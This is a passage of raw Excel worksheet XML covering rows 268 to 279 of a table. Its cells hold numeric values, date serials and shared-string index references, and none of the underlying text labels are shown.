      <c r="AT268" t="s">
        <v>58</v>
      </c>
      <c r="AU268">
        <v>24</v>
      </c>
      <c r="AV268">
        <v>1</v>
      </c>
      <c r="AW268">
        <v>29</v>
      </c>
      <c r="AX268">
        <v>70</v>
      </c>
      <c r="AY268">
        <v>14</v>
      </c>
      <c r="AZ268">
        <v>15</v>
      </c>
      <c r="BA268" t="s">
        <v>17022</v>
      </c>
      <c r="BB268" t="s">
        <v>14621</v>
      </c>
      <c r="BC268">
        <v>0</v>
      </c>
      <c r="BD268" t="s">
        <v>13085</v>
      </c>
    </row>
    <row r="269" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A269">
        <v>117</v>
      </c>
      <c r="B269" t="s">
        <v>2280</v>
      </c>
      <c r="C269" t="s">
        <v>99</v>
      </c>
      <c r="D269" t="s">
        <v>2281</v>
      </c>
      <c r="E269" t="s">
        <v>111</v>
      </c>
      <c r="F269" t="s">
        <v>2282</v>
      </c>
      <c r="G269" s="1">
        <v>44286</v>
      </c>
      <c r="H269">
        <v>9225</v>
      </c>
      <c r="I269">
        <v>9225</v>
      </c>
      <c r="J269">
        <v>2</v>
      </c>
      <c r="K269">
        <v>1</v>
      </c>
      <c r="L269">
        <v>2</v>
      </c>
      <c r="M269">
        <v>0</v>
      </c>
      <c r="N269">
        <v>0</v>
      </c>
      <c r="O269">
        <v>0</v>
      </c>
      <c r="P269">
        <v>0</v>
      </c>
      <c r="Q269">
        <v>1</v>
      </c>
      <c r="R269">
        <v>3</v>
      </c>
      <c r="S269">
        <v>0</v>
      </c>
      <c r="T269">
        <v>0</v>
      </c>
      <c r="U269">
        <v>160000</v>
      </c>
      <c r="V269">
        <v>5000</v>
      </c>
      <c r="W269">
        <v>8000</v>
      </c>
      <c r="X269">
        <v>0</v>
      </c>
      <c r="Y269">
        <v>0</v>
      </c>
      <c r="Z269">
        <v>0</v>
      </c>
      <c r="AA269">
        <v>0</v>
      </c>
      <c r="AB269">
        <v>200</v>
      </c>
      <c r="AC269">
        <v>900</v>
      </c>
      <c r="AD269">
        <v>0</v>
      </c>
      <c r="AE269">
        <v>0</v>
      </c>
      <c r="AF269" t="s">
        <v>1239</v>
      </c>
      <c r="AG269">
        <v>14440</v>
      </c>
      <c r="AH269">
        <v>12</v>
      </c>
      <c r="AJ269">
        <v>160</v>
      </c>
      <c r="AK269" t="s">
        <v>114</v>
      </c>
      <c r="AL269" t="s">
        <v>114</v>
      </c>
      <c r="AM269" t="s">
        <v>2283</v>
      </c>
      <c r="AN269" t="s">
        <v>55</v>
      </c>
      <c r="AO269">
        <v>2003</v>
      </c>
      <c r="AP269" t="s">
        <v>2284</v>
      </c>
      <c r="AQ269" t="s">
        <v>2285</v>
      </c>
      <c r="AR269" t="s">
        <v>1239</v>
      </c>
      <c r="AS269" t="s">
        <v>71</v>
      </c>
      <c r="AT269" t="s">
        <v>58</v>
      </c>
      <c r="AU269">
        <v>49</v>
      </c>
      <c r="AV269">
        <v>0</v>
      </c>
      <c r="AW269">
        <v>0</v>
      </c>
      <c r="AX269">
        <v>0</v>
      </c>
      <c r="AY269">
        <v>45</v>
      </c>
      <c r="AZ269">
        <v>37</v>
      </c>
      <c r="BA269" t="s">
        <v>16614</v>
      </c>
      <c r="BB269" t="s">
        <v>14312</v>
      </c>
      <c r="BC269">
        <v>0</v>
      </c>
      <c r="BD269" t="s">
        <v>12098</v>
      </c>
    </row>
    <row r="270" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A270">
        <v>149</v>
      </c>
      <c r="B270" t="s">
        <v>2286</v>
      </c>
      <c r="C270" t="s">
        <v>168</v>
      </c>
      <c r="D270" t="s">
        <v>2287</v>
      </c>
      <c r="E270" t="s">
        <v>131</v>
      </c>
      <c r="F270" t="s">
        <v>2288</v>
      </c>
      <c r="G270" s="1">
        <v>44243</v>
      </c>
      <c r="H270">
        <v>9231</v>
      </c>
      <c r="I270">
        <v>9231</v>
      </c>
      <c r="J270">
        <v>0</v>
      </c>
      <c r="K270">
        <v>1</v>
      </c>
      <c r="L270">
        <v>0</v>
      </c>
      <c r="M270">
        <v>0</v>
      </c>
      <c r="N270">
        <v>0</v>
      </c>
      <c r="O270">
        <v>0</v>
      </c>
      <c r="P270">
        <v>0</v>
      </c>
      <c r="Q270">
        <v>1</v>
      </c>
      <c r="R270">
        <v>0</v>
      </c>
      <c r="S270">
        <v>0</v>
      </c>
      <c r="T270">
        <v>1</v>
      </c>
      <c r="U270">
        <v>0</v>
      </c>
      <c r="V270">
        <v>1</v>
      </c>
      <c r="W270">
        <v>0</v>
      </c>
      <c r="X270">
        <v>0</v>
      </c>
      <c r="Y270">
        <v>0</v>
      </c>
      <c r="Z270">
        <v>0</v>
      </c>
      <c r="AA270">
        <v>0</v>
      </c>
      <c r="AB270">
        <v>25</v>
      </c>
      <c r="AC270">
        <v>0</v>
      </c>
      <c r="AD270">
        <v>0</v>
      </c>
      <c r="AE270">
        <v>100</v>
      </c>
      <c r="AF270" t="s">
        <v>2289</v>
      </c>
      <c r="AG270">
        <v>17550</v>
      </c>
      <c r="AH270">
        <v>13</v>
      </c>
      <c r="AJ270">
        <v>176</v>
      </c>
      <c r="AK270" t="s">
        <v>1532</v>
      </c>
      <c r="AL270" t="s">
        <v>2290</v>
      </c>
      <c r="AM270" t="s">
        <v>2291</v>
      </c>
      <c r="AN270" t="s">
        <v>55</v>
      </c>
      <c r="AO270">
        <v>2000</v>
      </c>
      <c r="AP270" t="s">
        <v>2292</v>
      </c>
      <c r="AQ270" t="s">
        <v>2293</v>
      </c>
      <c r="AR270" t="s">
        <v>2289</v>
      </c>
      <c r="AS270" t="s">
        <v>553</v>
      </c>
      <c r="AT270" t="s">
        <v>58</v>
      </c>
      <c r="AU270">
        <v>5</v>
      </c>
      <c r="AV270">
        <v>2</v>
      </c>
      <c r="AW270">
        <v>2</v>
      </c>
      <c r="AX270">
        <v>0</v>
      </c>
      <c r="AY270">
        <v>2</v>
      </c>
      <c r="AZ270">
        <v>0</v>
      </c>
      <c r="BA270" t="s">
        <v>17358</v>
      </c>
      <c r="BB270" t="s">
        <v>14341</v>
      </c>
      <c r="BC270">
        <v>0</v>
      </c>
      <c r="BD270">
        <v>0</v>
      </c>
    </row>
    <row r="271" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A271">
        <v>91</v>
      </c>
      <c r="B271" t="s">
        <v>2294</v>
      </c>
      <c r="C271" t="s">
        <v>99</v>
      </c>
      <c r="D271" t="s">
        <v>2295</v>
      </c>
      <c r="E271" t="s">
        <v>363</v>
      </c>
      <c r="F271" t="s">
        <v>764</v>
      </c>
      <c r="G271" s="1">
        <v>44284</v>
      </c>
      <c r="H271">
        <v>9338</v>
      </c>
      <c r="I271">
        <v>9338</v>
      </c>
      <c r="J271">
        <v>0</v>
      </c>
      <c r="K271">
        <v>1</v>
      </c>
      <c r="L271">
        <v>0</v>
      </c>
      <c r="M271">
        <v>0</v>
      </c>
      <c r="N271">
        <v>0</v>
      </c>
      <c r="O271">
        <v>0</v>
      </c>
      <c r="P271">
        <v>0</v>
      </c>
      <c r="Q271">
        <v>0</v>
      </c>
      <c r="R271">
        <v>0</v>
      </c>
      <c r="S271">
        <v>0</v>
      </c>
      <c r="T271">
        <v>1</v>
      </c>
      <c r="U271">
        <v>0</v>
      </c>
      <c r="V271">
        <v>300000</v>
      </c>
      <c r="W271">
        <v>0</v>
      </c>
      <c r="X271">
        <v>0</v>
      </c>
      <c r="Y271">
        <v>0</v>
      </c>
      <c r="Z271">
        <v>0</v>
      </c>
      <c r="AA271">
        <v>0</v>
      </c>
      <c r="AB271">
        <v>0</v>
      </c>
      <c r="AC271">
        <v>0</v>
      </c>
      <c r="AD271">
        <v>0</v>
      </c>
      <c r="AE271">
        <v>20000</v>
      </c>
      <c r="AF271" t="s">
        <v>2296</v>
      </c>
      <c r="AG271">
        <v>11840</v>
      </c>
      <c r="AH271">
        <v>12</v>
      </c>
      <c r="AJ271">
        <v>159</v>
      </c>
      <c r="AK271" t="s">
        <v>405</v>
      </c>
      <c r="AL271" t="s">
        <v>303</v>
      </c>
      <c r="AM271" t="s">
        <v>2297</v>
      </c>
      <c r="AN271" t="s">
        <v>55</v>
      </c>
      <c r="AO271">
        <v>2013</v>
      </c>
      <c r="AP271" t="s">
        <v>2298</v>
      </c>
      <c r="AQ271" t="s">
        <v>2299</v>
      </c>
      <c r="AR271" t="s">
        <v>2300</v>
      </c>
      <c r="AS271" t="s">
        <v>71</v>
      </c>
      <c r="AT271" t="s">
        <v>58</v>
      </c>
      <c r="AU271">
        <v>0</v>
      </c>
      <c r="AV271">
        <v>0</v>
      </c>
      <c r="AW271">
        <v>7</v>
      </c>
      <c r="AX271">
        <v>0</v>
      </c>
      <c r="AY271">
        <v>10</v>
      </c>
      <c r="AZ271">
        <v>0</v>
      </c>
      <c r="BA271" t="s">
        <v>16589</v>
      </c>
      <c r="BB271" t="s">
        <v>14237</v>
      </c>
      <c r="BC271">
        <v>0</v>
      </c>
      <c r="BD271" t="s">
        <v>10103</v>
      </c>
    </row>
    <row r="272" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A272">
        <v>92</v>
      </c>
      <c r="B272" t="s">
        <v>2301</v>
      </c>
      <c r="C272" t="s">
        <v>99</v>
      </c>
      <c r="D272" t="s">
        <v>2302</v>
      </c>
      <c r="E272" t="s">
        <v>300</v>
      </c>
      <c r="F272" t="s">
        <v>2303</v>
      </c>
      <c r="G272" s="1">
        <v>44295</v>
      </c>
      <c r="H272">
        <v>9364</v>
      </c>
      <c r="I272">
        <v>9364</v>
      </c>
      <c r="J272">
        <v>2</v>
      </c>
      <c r="K272">
        <v>1</v>
      </c>
      <c r="L272">
        <v>0</v>
      </c>
      <c r="M272">
        <v>0</v>
      </c>
      <c r="N272">
        <v>0</v>
      </c>
      <c r="O272">
        <v>0</v>
      </c>
      <c r="P272">
        <v>0</v>
      </c>
      <c r="Q272">
        <v>2</v>
      </c>
      <c r="R272">
        <v>5</v>
      </c>
      <c r="S272">
        <v>0</v>
      </c>
      <c r="T272">
        <v>1</v>
      </c>
      <c r="U272">
        <v>5000</v>
      </c>
      <c r="V272">
        <v>2500</v>
      </c>
      <c r="W272">
        <v>5000</v>
      </c>
      <c r="X272">
        <v>0</v>
      </c>
      <c r="Y272">
        <v>0</v>
      </c>
      <c r="Z272">
        <v>0</v>
      </c>
      <c r="AA272">
        <v>0</v>
      </c>
      <c r="AB272">
        <v>50</v>
      </c>
      <c r="AC272">
        <v>200</v>
      </c>
      <c r="AD272">
        <v>0</v>
      </c>
      <c r="AE272">
        <v>1000</v>
      </c>
      <c r="AF272" t="s">
        <v>2304</v>
      </c>
      <c r="AG272">
        <v>14450</v>
      </c>
      <c r="AH272">
        <v>12</v>
      </c>
      <c r="AJ272">
        <v>160</v>
      </c>
      <c r="AK272" t="s">
        <v>114</v>
      </c>
      <c r="AL272" t="s">
        <v>115</v>
      </c>
      <c r="AM272" t="s">
        <v>2305</v>
      </c>
      <c r="AN272" t="s">
        <v>55</v>
      </c>
      <c r="AO272">
        <v>1989</v>
      </c>
      <c r="AP272" t="s">
        <v>2306</v>
      </c>
      <c r="AQ272">
        <v>81386633964</v>
      </c>
      <c r="AR272" t="s">
        <v>2304</v>
      </c>
      <c r="AS272" t="s">
        <v>71</v>
      </c>
      <c r="AT272" t="s">
        <v>58</v>
      </c>
      <c r="AU272">
        <v>0</v>
      </c>
      <c r="AV272">
        <v>0</v>
      </c>
      <c r="AW272">
        <v>0</v>
      </c>
      <c r="AX272">
        <v>0</v>
      </c>
      <c r="AY272">
        <v>3</v>
      </c>
      <c r="AZ272">
        <v>4</v>
      </c>
      <c r="BA272" t="s">
        <v>16605</v>
      </c>
      <c r="BB272" t="s">
        <v>14288</v>
      </c>
      <c r="BC272">
        <v>0</v>
      </c>
      <c r="BD272" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="273" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A273">
        <v>524</v>
      </c>
      <c r="B273" t="s">
        <v>2307</v>
      </c>
      <c r="C273" t="s">
        <v>2308</v>
      </c>
      <c r="D273" t="s">
        <v>2309</v>
      </c>
      <c r="E273" t="s">
        <v>2310</v>
      </c>
      <c r="F273" t="s">
        <v>2311</v>
      </c>
      <c r="G273" s="1">
        <v>43852</v>
      </c>
      <c r="H273">
        <v>9437</v>
      </c>
      <c r="I273">
        <v>9437</v>
      </c>
      <c r="J273">
        <v>1</v>
      </c>
      <c r="K273">
        <v>0</v>
      </c>
      <c r="L273">
        <v>0</v>
      </c>
      <c r="M273">
        <v>0</v>
      </c>
      <c r="N273">
        <v>0</v>
      </c>
      <c r="O273">
        <v>1</v>
      </c>
      <c r="P273">
        <v>6</v>
      </c>
      <c r="Q273">
        <v>0</v>
      </c>
      <c r="R273">
        <v>0</v>
      </c>
      <c r="S273">
        <v>7</v>
      </c>
      <c r="T273">
        <v>1</v>
      </c>
      <c r="U273">
        <v>1000</v>
      </c>
      <c r="V273">
        <v>0</v>
      </c>
      <c r="W273">
        <v>0</v>
      </c>
      <c r="X273">
        <v>0</v>
      </c>
      <c r="Y273">
        <v>0</v>
      </c>
      <c r="Z273">
        <v>0</v>
      </c>
      <c r="AA273">
        <v>6000</v>
      </c>
      <c r="AB273">
        <v>0</v>
      </c>
      <c r="AC273">
        <v>0</v>
      </c>
      <c r="AD273">
        <v>7000</v>
      </c>
      <c r="AE273">
        <v>750000</v>
      </c>
      <c r="AF273" t="s">
        <v>2312</v>
      </c>
      <c r="AG273">
        <v>98414</v>
      </c>
      <c r="AH273">
        <v>33</v>
      </c>
      <c r="AJ273">
        <v>485</v>
      </c>
      <c r="AK273" t="s">
        <v>2313</v>
      </c>
      <c r="AL273" t="s">
        <v>2314</v>
      </c>
      <c r="AM273" t="s">
        <v>2315</v>
      </c>
      <c r="AN273" t="s">
        <v>55</v>
      </c>
      <c r="AO273">
        <v>1992</v>
      </c>
      <c r="AP273" t="s">
        <v>2316</v>
      </c>
      <c r="AQ273" t="s">
        <v>2317</v>
      </c>
      <c r="AR273" t="s">
        <v>2318</v>
      </c>
      <c r="AS273" t="s">
        <v>71</v>
      </c>
      <c r="AT273" t="s">
        <v>86</v>
      </c>
      <c r="AU273">
        <v>26</v>
      </c>
      <c r="AV273">
        <v>1</v>
      </c>
      <c r="AW273">
        <v>48</v>
      </c>
      <c r="AX273">
        <v>177</v>
      </c>
      <c r="AY273">
        <v>0</v>
      </c>
      <c r="AZ273">
        <v>21</v>
      </c>
      <c r="BA273" t="s">
        <v>16710</v>
      </c>
      <c r="BB273" t="s">
        <v>14642</v>
      </c>
      <c r="BC273">
        <v>0</v>
      </c>
      <c r="BD273">
        <v>0</v>
      </c>
    </row>
    <row r="274" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A274">
        <v>111</v>
      </c>
      <c r="B274" t="s">
        <v>2319</v>
      </c>
      <c r="C274" t="s">
        <v>99</v>
      </c>
      <c r="D274" t="s">
        <v>2320</v>
      </c>
      <c r="E274" t="s">
        <v>142</v>
      </c>
      <c r="F274" t="s">
        <v>2321</v>
      </c>
      <c r="G274" s="1">
        <v>44306</v>
      </c>
      <c r="H274">
        <v>9550</v>
      </c>
      <c r="I274">
        <v>9550</v>
      </c>
      <c r="J274">
        <v>2</v>
      </c>
      <c r="K274">
        <v>0</v>
      </c>
      <c r="L274">
        <v>1</v>
      </c>
      <c r="M274">
        <v>0</v>
      </c>
      <c r="N274">
        <v>0</v>
      </c>
      <c r="O274">
        <v>0</v>
      </c>
      <c r="P274">
        <v>0</v>
      </c>
      <c r="Q274">
        <v>0</v>
      </c>
      <c r="R274">
        <v>0</v>
      </c>
      <c r="S274">
        <v>0</v>
      </c>
      <c r="T274">
        <v>0</v>
      </c>
      <c r="U274">
        <v>1000000</v>
      </c>
      <c r="V274">
        <v>0</v>
      </c>
      <c r="W274">
        <v>5000</v>
      </c>
      <c r="X274">
        <v>0</v>
      </c>
      <c r="Y274">
        <v>0</v>
      </c>
      <c r="Z274">
        <v>0</v>
      </c>
      <c r="AA274">
        <v>0</v>
      </c>
      <c r="AB274">
        <v>0</v>
      </c>
      <c r="AC274">
        <v>0</v>
      </c>
      <c r="AD274">
        <v>0</v>
      </c>
      <c r="AE274">
        <v>0</v>
      </c>
      <c r="AF274" t="s">
        <v>2322</v>
      </c>
      <c r="AG274">
        <v>14450</v>
      </c>
      <c r="AH274">
        <v>12</v>
      </c>
      <c r="AJ274">
        <v>160</v>
      </c>
      <c r="AK274" t="s">
        <v>114</v>
      </c>
      <c r="AL274" t="s">
        <v>115</v>
      </c>
      <c r="AM274" t="s">
        <v>2323</v>
      </c>
      <c r="AN274" t="s">
        <v>55</v>
      </c>
      <c r="AO274">
        <v>2017</v>
      </c>
      <c r="AP274">
        <v>216614249</v>
      </c>
      <c r="AQ274" t="s">
        <v>2324</v>
      </c>
      <c r="AR274" t="s">
        <v>2325</v>
      </c>
      <c r="AS274" t="s">
        <v>71</v>
      </c>
      <c r="AT274" t="s">
        <v>58</v>
      </c>
      <c r="AU274">
        <v>26</v>
      </c>
      <c r="AV274">
        <v>0</v>
      </c>
      <c r="AW274">
        <v>0</v>
      </c>
      <c r="AX274">
        <v>0</v>
      </c>
      <c r="AY274">
        <v>37</v>
      </c>
      <c r="AZ274">
        <v>3</v>
      </c>
      <c r="BA274" t="s">
        <v>16610</v>
      </c>
      <c r="BB274" t="s">
        <v>14306</v>
      </c>
      <c r="BC274">
        <v>0</v>
      </c>
      <c r="BD274" t="s">
        <v>10037</v>
      </c>
    </row>
    <row r="275" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A275">
        <v>102</v>
      </c>
      <c r="B275" t="s">
        <v>2326</v>
      </c>
      <c r="C275" t="s">
        <v>790</v>
      </c>
      <c r="D275" t="s">
        <v>2327</v>
      </c>
      <c r="E275" t="s">
        <v>300</v>
      </c>
      <c r="F275" t="s">
        <v>2328</v>
      </c>
      <c r="G275" s="1">
        <v>44299</v>
      </c>
      <c r="H275">
        <v>9566</v>
      </c>
      <c r="I275">
        <v>9566</v>
      </c>
      <c r="J275">
        <v>1</v>
      </c>
      <c r="K275">
        <v>2</v>
      </c>
      <c r="L275">
        <v>2</v>
      </c>
      <c r="M275">
        <v>0</v>
      </c>
      <c r="N275">
        <v>0</v>
      </c>
      <c r="O275">
        <v>0</v>
      </c>
      <c r="P275">
        <v>0</v>
      </c>
      <c r="Q275">
        <v>1</v>
      </c>
      <c r="R275">
        <v>1</v>
      </c>
      <c r="S275">
        <v>0</v>
      </c>
      <c r="T275">
        <v>0</v>
      </c>
      <c r="U275">
        <v>100000</v>
      </c>
      <c r="V275">
        <v>3000</v>
      </c>
      <c r="W275">
        <v>4000</v>
      </c>
      <c r="X275">
        <v>0</v>
      </c>
      <c r="Y275">
        <v>0</v>
      </c>
      <c r="Z275">
        <v>0</v>
      </c>
      <c r="AA275">
        <v>0</v>
      </c>
      <c r="AB275">
        <v>0</v>
      </c>
      <c r="AC275">
        <v>15000</v>
      </c>
      <c r="AD275">
        <v>0</v>
      </c>
      <c r="AE275">
        <v>0</v>
      </c>
      <c r="AF275" t="s">
        <v>2329</v>
      </c>
      <c r="AG275">
        <v>93791</v>
      </c>
      <c r="AH275">
        <v>27</v>
      </c>
      <c r="AJ275">
        <v>429</v>
      </c>
      <c r="AK275" t="s">
        <v>2330</v>
      </c>
      <c r="AL275" t="s">
        <v>2331</v>
      </c>
      <c r="AM275" t="s">
        <v>2332</v>
      </c>
      <c r="AN275" t="s">
        <v>55</v>
      </c>
      <c r="AO275">
        <v>2011</v>
      </c>
      <c r="AP275">
        <v>81242201496</v>
      </c>
      <c r="AQ275" t="s">
        <v>2333</v>
      </c>
      <c r="AR275" t="s">
        <v>2334</v>
      </c>
      <c r="AS275" t="s">
        <v>71</v>
      </c>
      <c r="AT275" t="s">
        <v>58</v>
      </c>
      <c r="AU275">
        <v>6</v>
      </c>
      <c r="AV275">
        <v>1</v>
      </c>
      <c r="AW275">
        <v>7</v>
      </c>
      <c r="AX275">
        <v>0</v>
      </c>
      <c r="AY275">
        <v>7</v>
      </c>
      <c r="AZ275">
        <v>7</v>
      </c>
      <c r="BA275" t="s">
        <v>16607</v>
      </c>
      <c r="BB275" t="s">
        <v>14296</v>
      </c>
      <c r="BC275" t="s">
        <v>9550</v>
      </c>
      <c r="BD275" t="s">
        <v>10018</v>
      </c>
    </row>
    <row r="276" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A276">
        <v>10</v>
      </c>
      <c r="B276" t="s">
        <v>2335</v>
      </c>
      <c r="C276" t="s">
        <v>99</v>
      </c>
      <c r="D276" t="s">
        <v>2336</v>
      </c>
      <c r="E276" t="s">
        <v>142</v>
      </c>
      <c r="F276" t="s">
        <v>1564</v>
      </c>
      <c r="G276" s="1">
        <v>44319</v>
      </c>
      <c r="H276">
        <v>9588</v>
      </c>
      <c r="I276">
        <v>9588</v>
      </c>
      <c r="J276">
        <v>1</v>
      </c>
      <c r="K276">
        <v>0</v>
      </c>
      <c r="L276">
        <v>0</v>
      </c>
      <c r="M276">
        <v>0</v>
      </c>
      <c r="N276">
        <v>0</v>
      </c>
      <c r="O276">
        <v>0</v>
      </c>
      <c r="P276">
        <v>0</v>
      </c>
      <c r="Q276">
        <v>0</v>
      </c>
      <c r="R276">
        <v>0</v>
      </c>
      <c r="S276">
        <v>0</v>
      </c>
      <c r="T276">
        <v>0</v>
      </c>
      <c r="U276">
        <v>500000</v>
      </c>
      <c r="V276">
        <v>0</v>
      </c>
      <c r="W276">
        <v>0</v>
      </c>
      <c r="X276">
        <v>0</v>
      </c>
      <c r="Y276">
        <v>0</v>
      </c>
      <c r="Z276">
        <v>0</v>
      </c>
      <c r="AA276">
        <v>0</v>
      </c>
      <c r="AB276">
        <v>0</v>
      </c>
      <c r="AC276">
        <v>0</v>
      </c>
      <c r="AD276">
        <v>0</v>
      </c>
      <c r="AE276">
        <v>0</v>
      </c>
      <c r="AF276" t="s">
        <v>2337</v>
      </c>
      <c r="AG276">
        <v>11710</v>
      </c>
      <c r="AH276">
        <v>12</v>
      </c>
      <c r="AJ276">
        <v>159</v>
      </c>
      <c r="AK276" t="s">
        <v>405</v>
      </c>
      <c r="AL276" t="s">
        <v>2338</v>
      </c>
      <c r="AM276" t="s">
        <v>2339</v>
      </c>
      <c r="AN276" t="s">
        <v>55</v>
      </c>
      <c r="AO276">
        <v>2013</v>
      </c>
      <c r="AP276" t="s">
        <v>2340</v>
      </c>
      <c r="AQ276" t="s">
        <v>2341</v>
      </c>
      <c r="AR276" t="s">
        <v>2337</v>
      </c>
      <c r="AS276" t="s">
        <v>179</v>
      </c>
      <c r="AT276" t="s">
        <v>58</v>
      </c>
      <c r="AU276">
        <v>0</v>
      </c>
      <c r="AV276">
        <v>0</v>
      </c>
      <c r="AW276">
        <v>0</v>
      </c>
      <c r="AX276">
        <v>0</v>
      </c>
      <c r="AY276">
        <v>4</v>
      </c>
      <c r="AZ276">
        <v>0</v>
      </c>
      <c r="BA276" t="s">
        <v>16583</v>
      </c>
      <c r="BB276" t="s">
        <v>14213</v>
      </c>
      <c r="BC276" t="s">
        <v>10029</v>
      </c>
      <c r="BD276">
        <v>0</v>
      </c>
    </row>
    <row r="277" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A277">
        <v>632</v>
      </c>
      <c r="B277" t="s">
        <v>2342</v>
      </c>
      <c r="C277" t="s">
        <v>318</v>
      </c>
      <c r="D277" t="s">
        <v>2343</v>
      </c>
      <c r="E277" t="s">
        <v>131</v>
      </c>
      <c r="F277" t="s">
        <v>2344</v>
      </c>
      <c r="G277" s="1">
        <v>44313</v>
      </c>
      <c r="H277">
        <v>9687</v>
      </c>
      <c r="I277">
        <v>9687</v>
      </c>
      <c r="J277">
        <v>0</v>
      </c>
      <c r="K277">
        <v>0</v>
      </c>
      <c r="L277">
        <v>0</v>
      </c>
      <c r="M277">
        <v>0</v>
      </c>
      <c r="N277">
        <v>0</v>
      </c>
      <c r="O277">
        <v>0</v>
      </c>
      <c r="P277">
        <v>0</v>
      </c>
      <c r="Q277">
        <v>3</v>
      </c>
      <c r="R277">
        <v>1</v>
      </c>
      <c r="S277">
        <v>0</v>
      </c>
      <c r="T277">
        <v>2</v>
      </c>
      <c r="U277">
        <v>0</v>
      </c>
      <c r="V277">
        <v>0</v>
      </c>
      <c r="W277">
        <v>0</v>
      </c>
      <c r="X277">
        <v>0</v>
      </c>
      <c r="Y277">
        <v>0</v>
      </c>
      <c r="Z277">
        <v>0</v>
      </c>
      <c r="AA277">
        <v>0</v>
      </c>
      <c r="AB277">
        <v>4000</v>
      </c>
      <c r="AC277">
        <v>4000</v>
      </c>
      <c r="AD277">
        <v>0</v>
      </c>
      <c r="AE277">
        <v>100</v>
      </c>
      <c r="AF277" t="s">
        <v>2345</v>
      </c>
      <c r="AG277">
        <v>90244</v>
      </c>
      <c r="AH277">
        <v>26</v>
      </c>
      <c r="AJ277">
        <v>420</v>
      </c>
      <c r="AK277" t="s">
        <v>331</v>
      </c>
      <c r="AL277" t="s">
        <v>936</v>
      </c>
      <c r="AM277" t="s">
        <v>2346</v>
      </c>
      <c r="AN277" t="s">
        <v>55</v>
      </c>
      <c r="AO277">
        <v>2005</v>
      </c>
      <c r="AP277" t="s">
        <v>2347</v>
      </c>
      <c r="AQ277" t="s">
        <v>2348</v>
      </c>
      <c r="AR277" t="s">
        <v>2349</v>
      </c>
      <c r="AS277" t="s">
        <v>71</v>
      </c>
      <c r="AT277" t="s">
        <v>58</v>
      </c>
      <c r="AU277">
        <v>24</v>
      </c>
      <c r="AV277">
        <v>3</v>
      </c>
      <c r="AW277">
        <v>56</v>
      </c>
      <c r="AX277">
        <v>2</v>
      </c>
      <c r="AY277">
        <v>31</v>
      </c>
      <c r="AZ277">
        <v>1</v>
      </c>
      <c r="BA277" t="s">
        <v>16726</v>
      </c>
      <c r="BB277" t="s">
        <v>14736</v>
      </c>
      <c r="BC277">
        <v>0</v>
      </c>
      <c r="BD277" t="s">
        <v>13267</v>
      </c>
    </row>
    <row r="278" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A278">
        <v>108</v>
      </c>
      <c r="B278" t="s">
        <v>2350</v>
      </c>
      <c r="C278" t="s">
        <v>99</v>
      </c>
      <c r="D278" t="s">
        <v>2351</v>
      </c>
      <c r="E278" t="s">
        <v>300</v>
      </c>
      <c r="F278" t="s">
        <v>2352</v>
      </c>
      <c r="G278" s="1">
        <v>44322</v>
      </c>
      <c r="H278">
        <v>9746</v>
      </c>
      <c r="I278">
        <v>9746</v>
      </c>
      <c r="J278">
        <v>2</v>
      </c>
      <c r="K278">
        <v>2</v>
      </c>
      <c r="L278">
        <v>2</v>
      </c>
      <c r="M278">
        <v>0</v>
      </c>
      <c r="N278">
        <v>1500</v>
      </c>
      <c r="O278">
        <v>0</v>
      </c>
      <c r="P278">
        <v>0</v>
      </c>
      <c r="Q278">
        <v>19</v>
      </c>
      <c r="R278">
        <v>32</v>
      </c>
      <c r="S278">
        <v>0</v>
      </c>
      <c r="T278">
        <v>1</v>
      </c>
      <c r="U278">
        <v>14800000</v>
      </c>
      <c r="V278">
        <v>22000</v>
      </c>
      <c r="W278">
        <v>0</v>
      </c>
      <c r="X278">
        <v>0</v>
      </c>
      <c r="Y278">
        <v>0</v>
      </c>
      <c r="Z278">
        <v>0</v>
      </c>
      <c r="AA278">
        <v>0</v>
      </c>
      <c r="AB278">
        <v>6</v>
      </c>
      <c r="AC278">
        <v>7</v>
      </c>
      <c r="AD278">
        <v>0</v>
      </c>
      <c r="AE278">
        <v>22000</v>
      </c>
      <c r="AF278" t="s">
        <v>2353</v>
      </c>
      <c r="AG278">
        <v>14440</v>
      </c>
      <c r="AH278">
        <v>12</v>
      </c>
      <c r="AJ278">
        <v>160</v>
      </c>
      <c r="AK278" t="s">
        <v>114</v>
      </c>
      <c r="AL278" t="s">
        <v>114</v>
      </c>
      <c r="AM278" t="s">
        <v>2354</v>
      </c>
      <c r="AN278" t="s">
        <v>82</v>
      </c>
      <c r="AO278">
        <v>1999</v>
      </c>
      <c r="AP278" t="s">
        <v>2355</v>
      </c>
      <c r="AQ278" t="s">
        <v>2356</v>
      </c>
      <c r="AR278" t="s">
        <v>2357</v>
      </c>
      <c r="AS278" t="s">
        <v>71</v>
      </c>
      <c r="AT278" t="s">
        <v>86</v>
      </c>
      <c r="AU278">
        <v>6</v>
      </c>
      <c r="AV278">
        <v>1</v>
      </c>
      <c r="AW278">
        <v>0</v>
      </c>
      <c r="AX278">
        <v>0</v>
      </c>
      <c r="AY278">
        <v>103</v>
      </c>
      <c r="AZ278">
        <v>54</v>
      </c>
      <c r="BA278" t="s">
        <v>16609</v>
      </c>
      <c r="BB278" t="s">
        <v>14303</v>
      </c>
      <c r="BC278">
        <v>0</v>
      </c>
      <c r="BD278" t="s">
        <v>13516</v>
      </c>
    </row>
    <row r="279" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A279">
        <v>112</v>
      </c>
      <c r="B279" t="s">
        <v>2358</v>
      </c>
      <c r="C279" t="s">
        <v>99</v>
      </c>
      <c r="D279" t="s">
        <v>2359</v>
      </c>
      <c r="E279" t="s">
        <v>142</v>
      </c>
      <c r="F279" t="s">
        <v>2360</v>
      </c>
      <c r="G279" s="1">
        <v>44319</v>
      </c>
      <c r="H279">
        <v>9886</v>
      </c>
      <c r="I279">
        <v>9886</v>
      </c>
      <c r="J279">
        <v>1</v>
      </c>
      <c r="K279">
        <v>0</v>
      </c>
      <c r="L279">
        <v>1</v>
      </c>
      <c r="M279">
        <v>0</v>
      </c>
      <c r="N279">
        <v>0</v>
      </c>
      <c r="O279">
        <v>0</v>
      </c>
      <c r="P279">
